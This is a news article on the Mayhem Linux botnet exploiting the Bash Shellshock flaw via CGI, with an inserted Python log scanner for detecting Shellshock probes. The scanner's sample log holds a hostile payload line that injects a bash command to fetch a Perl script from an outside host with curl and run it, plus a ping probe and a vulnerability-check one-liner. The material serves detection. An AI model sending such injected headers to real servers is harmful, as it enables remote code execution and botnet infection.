Linux botnet Mayhem spreads through the Shellshock vulnerability
The impact of Shellshock continues: attackers are exploiting the recently disclosed vulnerability in the Bash command-line interpreter to infect Linux servers with the sophisticated malware program Mayhem.
Mayhem was discovered earlier this year and was thoroughly analyzed by researchers at the Russian Internet company Yandex. The malware is installed by a PHP script that attackers upload to the server after gaining access through stolen FTP passwords, website vulnerabilities, or brute-force guessing of website administration login credentials.
The main component of Mayhem is a malicious ELF shared library. Once installed, it downloads additional plug-ins and stores them in a hidden, encrypted file system. These plug-ins allow attackers to use newly infected servers to attack and infect other websites.
In July, Yandex researchers estimated that the botnet consisted of approximately 1,400 infected servers tied to two separate command-and-control servers.
Researchers from the independent research group Malware Must Die (MMD) reported earlier this week that the Mayhem authors have added a Shellshock exploit to the botnet's arsenal.
Shellshock is the collective name for several vulnerabilities recently discovered in the Bash command-line interpreter used on Linux and other Unix-like systems. They can be exploited to execute code remotely on a server through several attack vectors, including CGI (Common Gateway Interface), OpenSSH and DHCP (Dynamic Host Configuration Protocol), and in some configurations even OpenVPN.
According to MMD's researchers, the Shellshock attacks originating from the Mayhem botnet target web servers with CGI support. The botnet probes whether a web server is vulnerable to the Bash flaw and, if it is, uses the flaw to execute a Perl script.
The script carries malicious Mayhem ELF binaries for both 32-bit and 64-bit CPU architectures, embedded as hexadecimal data, and uses the LD_PRELOAD mechanism to extract and run them.
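The CGI vector described above leaves a distinctive trace: a vulnerable Bash treats any environment variable whose value begins with "() {" as a function definition and keeps executing whatever follows the closing brace, and a CGI web server exports request headers such as User-Agent and Referer as environment variables verbatim. The following detector, added here as an illustration and not part of the original article or of MMD's or Yandex's work, scans Apache-style "combined" access-log lines for that marker, pulls out the injected command, and notes whether the request targeted a CGI path. The log lines, IP addresses and the list of CGI path prefixes are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List

# A vulnerable Bash (CVE-2014-6271) parses an environment variable whose
# value starts with "() {" as a function and executes the text after the
# closing brace. Under CGI, headers become environment variables, so the
# marker appears unchanged in the access log.
FUNC_MARKER = re.compile(r"\(\s*\)\s*\{")

# Apache/nginx "combined" log format; quoted fields may contain \" escapes.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    rf'"(?P<referer>{_QUOTED})" "(?P<ua>{_QUOTED})"$'
)

# Hypothetical CGI path conventions; adjust to the server's ScriptAlias and
# AddHandler settings.
CGI_PREFIXES = ("/cgi-bin/", "/cgi/")
CGI_SUFFIXES = (".cgi", ".pl", ".sh")


@dataclass
class Hit:
    client: str
    path: str
    field: str        # header that carried the payload
    payload: str      # command text following the "() { ...; }" stub
    cgi_target: bool  # request aimed at a CGI-handled path


def is_cgi_path(path: str) -> bool:
    path = path.split("?", 1)[0]
    return path.startswith(CGI_PREFIXES) or path.endswith(CGI_SUFFIXES)


def extract_payload(value: str) -> str:
    """Return the command after an injected function body, or "" if none."""
    m = FUNC_MARKER.search(value)
    if not m:
        return ""
    rest = value[m.end():]
    brace = rest.find("}")
    tail = rest if brace == -1 else rest[brace + 1:]
    # Drop the "; " separator and undo the \" escaping Apache applies.
    return tail.lstrip("; ").strip().replace('\\"', '"')


def scan_log(text: str) -> List[Hit]:
    """Scan combined-format log text and return one Hit per injected header."""
    hits: List[Hit] = []
    for line in text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these
        for group, name in (("ua", "user_agent"), ("referer", "referer")):
            value = m.group(group)
            if FUNC_MARKER.search(value):
                hits.append(Hit(
                    client=m.group("client"),
                    path=m.group("path"),
                    field=name,
                    payload=extract_payload(value),
                    cgi_target=is_cgi_path(m.group("path")),
                ))
    return hits


# Constructed sample: two Shellshock probes and one benign request.
LOG_SAMPLE = """\
203.0.113.7 - - [10/Oct/2014:13:22:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \\"cd /tmp; curl -O http://198.51.100.9/x.pl; perl x.pl\\""
198.51.100.22 - - [10/Oct/2014:13:22:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [10/Oct/2014:13:22:09 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 210 "() { :; }; echo; /bin/ping -c 1 198.51.100.9" "-"
"""

if __name__ == "__main__":
    for h in scan_log(LOG_SAMPLE):
        flag = " (CGI)" if h.cgi_target else ""
        print(f"{h.client} -> {h.path}{flag} via {h.field}: {h.payload}")
```

The combined log format only records User-Agent and Referer, so a payload sent in Cookie, Host or a custom header is invisible here; logging those needs an extended LogFormat (for example `%{Cookie}i`) or inspection at the web server or IDS. The `echo;` seen in the second probe is a common trick to emit the blank line that terminates CGI response headers so the command's output reaches the attacker. Whether the local Bash is affected is checked independently with the well-known one-liner `env x='() { :;}; echo vulnerable' bash -c 'echo test'`, which prints "vulnerable" only on an unpatched build.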
Like earlier versions, it creates a hidden file system to store its additional components and plug-ins, tools that can be used to scan and attack other systems. MMD researchers believe that one of these components has been upgraded to exploit the new Shellshock vulnerability, but this has not yet been confirmed.
This theory is supported, however, by the observation that some of the Shellshock attacks seen originated from IP (Internet Protocol) addresses associated with the existing Mayhem botnet, alongside new IP addresses in the UK, Indonesia, Poland, Austria, Australia and Sweden. MMD has shared the information it collected with national Computer Emergency Response Teams (CERTs).
Most Linux distributions have released patches for the Shellshock vulnerabilities. However, many web servers, especially self-managed ones, are not configured to deploy updates automatically. Many Linux-based enterprise products and embedded devices, including web servers, are also affected by Shellshock; if patches for these products have not been installed, or are not available at all, they remain potential targets.